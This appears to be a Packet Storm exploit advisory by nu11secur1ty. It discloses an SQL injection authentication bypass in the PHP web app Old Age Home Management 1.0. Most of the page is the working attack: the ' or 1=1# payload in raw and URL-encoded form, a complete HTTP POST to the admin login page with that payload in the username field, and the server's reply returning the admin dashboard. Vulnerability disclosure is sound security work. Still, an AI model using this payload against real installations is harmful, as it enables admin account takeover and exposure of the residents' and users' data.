what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Old Age Home Management 1.0 SQL Injection

Old Age Home Management 1.0 SQL Injection
Posted May 1, 2023
Authored by nu11secur1ty

Old Age Home Management version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection
SHA-256 | 6dbc0dac3bea894598dae10e5fce781c47ae87adbd89ddb496e7eb7cfc60c6a7

Old Age Home Management 1.0 SQL Injection

Change Mirror Download
## Title: Old Age Home Management-2022-2023-1.0
SQLi-Bypass-Authentication-Account-Take-Over
## Author: nu11secur1ty
## Date: 04.29.2023
## Vendor: BY ANUJ KUMAR, https://phpgurukul.com/author/anujk305/
## Software: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/#google_vignette
## Reference: https://portswigger.net/web-security/sql-injection/lab-login-bypass


## Description:
The username parameter appears to be vulnerable to SQL injection
attacks. The payloads nu11secur1ty' or 1=1# or
nu11secur1ty%27+or+1%3D1%23 were each submitted in the username
parameter. These two requests resulted in different responses,
indicating that the input is being incorporated into a SQL query in an
unsafe way. The attacker easily can take control over the admin
account and then everything will be lost for this app and the users
who are using it.

STATUS: CRITICAL

[+]Exploit:
```MYSQL
POST /oahms/admin/login.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvg
Content-Length: 62
Cache-Control: max-age=0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/oahms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=
```
[+]Responce:
```HTTP
HTTP/1.1 200 OK
Date: Sat, 29 Apr 2023 05:32:07 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
Content-Security-Policy: upgrade-insecure-requests;
X-Powered-By: PHP/8.2.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13518

<!DOCTYPE html>
<html lang="en">

<head>

<title>Old Age Home Management System|| Dashboard</title>
<!-- base:css -->
<link rel="stylesheet" href="vendors/typicons/typicons.css">
<link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">
<link rel="stylesheet" href="css/vertical-layout-light/style.css">
<!-- endinject -->

</head>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0)

## Proof and Exploit
[href](https://streamable.com/qtj0bz)

## Time spend:
00:30:00


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close